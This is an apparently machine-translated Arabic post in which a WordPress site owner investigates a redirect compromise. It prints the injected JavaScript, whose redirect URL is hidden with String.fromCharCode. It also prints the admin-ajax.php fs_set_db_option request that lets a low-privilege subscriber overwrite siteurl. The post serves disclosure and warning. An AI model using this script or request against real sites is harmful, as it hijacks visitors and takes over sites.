في الأسبوع الماضي واجهت حقيقة غير سارة للغاية. بعد أن قمت بزيارة موقعي ، وجدت أنه يعيد توجيهي إلى مورد غير معروف بالنسبة لي ، والذي يقسمه برنامج مكافحة الفيروسات Dr. شبكة
بفخر بواسطة وورد الإصدار 5.1
يتم تثبيت جميع التحديثات الصادرة للمحرك والمكون الإضافي والسمة في الوقت المحدد. الإضافات فقط من مستودع الرسمية ، موضوع أيضا.
تم تنزيل النسخة الاحتياطية للموقع على الفور ، ومسحها ضوئيًا بواسطة برنامج مكافحة الفيروسات (Dr. Web ، و Kaspersky ، و AI-BOLIT) - ولكن لم تكن هناك نتائج ، فكل شيء نظيف.
فحص ملفات السمات وبعض المكونات الإضافية يدويًا ، ولكن مرة أخرى لم تكن هناك نتيجة.
عند التحقق من تفريغ قاعدة البيانات في جدول wp_options في معلمة siteurl ، تم إخفاء عنوان URL الخاص بشخص آخر. في الواقع ، كان هناك إعادة توجيه له.
حدث هذا وفقًا للمبدأ: عند تحميل الصفحة ، تم استبدال معلمة "siteurl" على الإطلاق
<script type='text/javascript' src=' URL '></script>
في هذه الحالة ، تم تحميل البرنامج النصي التالي:
var x = getCookie('pp000001'); if (x) { var x2 = getCookie('pp000002'); if (x2) { var sdfgdfg = "URL";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } else { setCookie('pp000002','1',1); var sdfgdfg = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 112, 117, 115, 104, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } } else { setCookie('pp000001','1',1); var sdfgdfg = "URL";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } function setCookie(name,value,days) { var expires = ""; if (days) { var date = new Date(); date.setTime(date.getTime() + (days*8*60*60*1000)); expires = "; expires=" + date.toUTCString(); } document.cookie = name + "=" + (value || "") + expires + "; path=/"; } function getCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function eraseCookie(name) { document.cookie = name+'=; Max-Age=-99999999;'; }
كيف يظل عنوان URL لشخص آخر في قاعدة البيانات يظل لغزًا. عند تغيير عنوان URL إلى العنوان الصحيح ، كان كل شيء يعمل مرة أخرى ، ولكن في اليوم التالي ، عند التحقق ، رأيت مرة أخرى Dr. يقسم الويب على الصفحة المعاد توجيهها. تم تغيير هذه المعلمة مرة أخرى في قاعدة البيانات.
بعد ذلك ، تم تنزيل سجلات وصول جديدة إلى الموقع وسجلات الأخطاء. لم تكن هناك أخطاء ، ولكن تم العثور على طلب مثير للاهتمام للغاية للموقع في سجلات الوصول:
/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=siteurl&option_value= URL
بعد تصحيح الإعدادات مرة أخرى والتحقق من أن كل شيء يعمل ، حاولت تكرار هذا الطلب على الموقع ، لكن لا شيء يعمل. لم يتغير الإعداد في قاعدة البيانات.
تجدر الإشارة إلى أن الموقع مفتوح للتسجيل ويحصل المستخدمون على دور "المشترك" ، والوصول إلى الجزء الإداري مغلق تمامًا.
جرت محاولة لتسجيل مستخدم جديد ، وتسجيل الدخول ، وبعد هذا الطلب إلى الموقع ، تم تغيير الإعداد في قاعدة البيانات.
ونتيجة لذلك ، اتضح أنه إذا كان تسجيل المستخدم مفتوحًا على الموقع ، حتى مع إغلاق دور المشترك والوصول إلى لوحة المسؤول ، فلا يزال هذا الطلب يعمل.
تم فحصه في موقع آخر ، بعد أن أوقف تشغيل جميع المكونات الإضافية سابقًا وضبط المظهر الافتراضي - والنتيجة هي نفسها.
كيفية القتال ، باستثناء كيفية إيقاف التسجيل وإزالة المستخدمين المشتبه فيهم - لم أجد حلاً بعد.
ملاحظة: جوجل الطلب ، تم العثور على المواقع المصابة ، كن حذرا.